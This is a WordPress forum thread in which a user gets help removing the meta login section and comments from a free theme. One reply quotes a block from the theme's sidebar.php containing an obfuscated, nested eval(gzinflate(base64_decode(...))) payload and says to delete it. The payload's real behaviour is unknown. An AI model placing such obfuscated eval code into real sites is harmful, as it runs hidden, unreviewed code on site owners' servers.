8 replies
  • WEB DESIGN
  • |
ok so i just recently grabbed one of those free themes from a free wpthemes site and i want to take away the meta login option on the page as well as delete the comments section on the page .. However i'm having some problems with getting this done .. can anyone show me how to do this ..

thanks a bunch ..
  • Profile picture of the author angelie
    You can check if the meta login info is placed via widgets (i.e. wp-admin > Appearance > Widgets). If it's not there, you'll need to remove it from the themes files. I'm assuming that it is in the sidebar.php

    To remove the comment in the page template, open the page.php file of the theme, then remove the following line:

    PHP Code:
    <?php comments_template''true ); ?>
    Just do an edit > Find > "comments_template" to see that line.

    Hope that helps.
    {{ DiscussionBoard.errors[4593096].message }}
  • Profile picture of the author eddie jay
    hey thanks for replying ... when i go to the side bar i dont see the partiular code that you are referring to .. Is there another place where i would see the code . When i click on the editor option , the first set of code that comes up is the style sheet ( never heard of that before ) . I searched and found that code , deletd that code, and i still see the meta info on the site ugh!!! ... hopes this makes sense
    {{ DiscussionBoard.errors[4593215].message }}
    • Profile picture of the author angelie
      You said that this is a free theme right? Please send me the link to download this theme so I can check out the code and apply the changes you need.
      {{ DiscussionBoard.errors[4593236].message }}
      • Profile picture of the author angelie
        Ok I have downloaded the theme. To remove the comments, delete this line at single.php:

        Code:
        	<?php comments_template(); ?>
        As for the meta log-in, can you PM me the link to your website so I can see it in action? I see encrypted codes in the theme's sidebar.php
        {{ DiscussionBoard.errors[4600655].message }}
  • Profile picture of the author guavasofts
    if you know about free theme site so send me the link i want to use it..
    i realy urgently required it
    {{ DiscussionBoard.errors[4600757].message }}
  • Profile picture of the author eddie jay
    "if you know about free theme site so send me the link i want to use it..
    i realy urgently required it "


    go to google and in the search bar type in free wp themes and you'll find all sorts of info there hope this helps
    {{ DiscussionBoard.errors[4609801].message }}
    • Profile picture of the author angelie
      Hey Eddie! Just saw your PM. The free theme that you use has encrypted codes in the sidebar, it is for showing the "Meta" section in the sidebar where he has the affiliate link to "Wordpress Hosting" link, I guess

      So to remove that section, try deleting these lines from sidebar.php:

      Code:
      <div class="widget_style" id="meta">
      								<div class="cats_head_bg">
                                  
       <?php eval("?>".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHZokJAAADQD/Igy1ge7oMlpoRBU/GGLBFjEkZff88xS+fS9P5mGHZkSLjNvLjz05kIyfm2Cobq83iM8g9Wqkofikk5+y11DepLwAunT3RbUWZJcA8BjLjiUVTx4/7KDD67oolYQt930auvdySS1NV9J0m9Dh3I7YsaYpXsLbLzoDGdl5UDWr1fD1wctk9OcvFmoqg6qqJJmBmt4uAcK+SoiXovlUrPOa1jmtoKo/2dsaTQ2YYKcJsBF7zr8YsC3o6mcelPJaPXfR9jm6cyvH+ERd1d6peX575iTagKD5yk52HY8pG3/PL+Xaxs2odWIeCqCvIj0c0QZjagnibKymKFrKaJGMQwnVb9BeKgabcLQmJP9OHmvOeAmBzdDw2zVYjrZqWyi8LfompCHKRAC3zz9V7aDV7IJsITybcr2Rtp0WhIpeE4oyI45Ur9i7OEmz48i0gwxTTajaJczvcbswt/qhNCBcDcA4YsL/RfLwkdz9Uj3P7+/gE='))))))); ?> 
        
      																		 
      							</ul></div>
      {{ DiscussionBoard.errors[4612781].message }}
      • Profile picture of the author eddie jay
        hey thanks for everything .. it's been really helpful
        {{ DiscussionBoard.errors[4711729].message }}

Trending Topics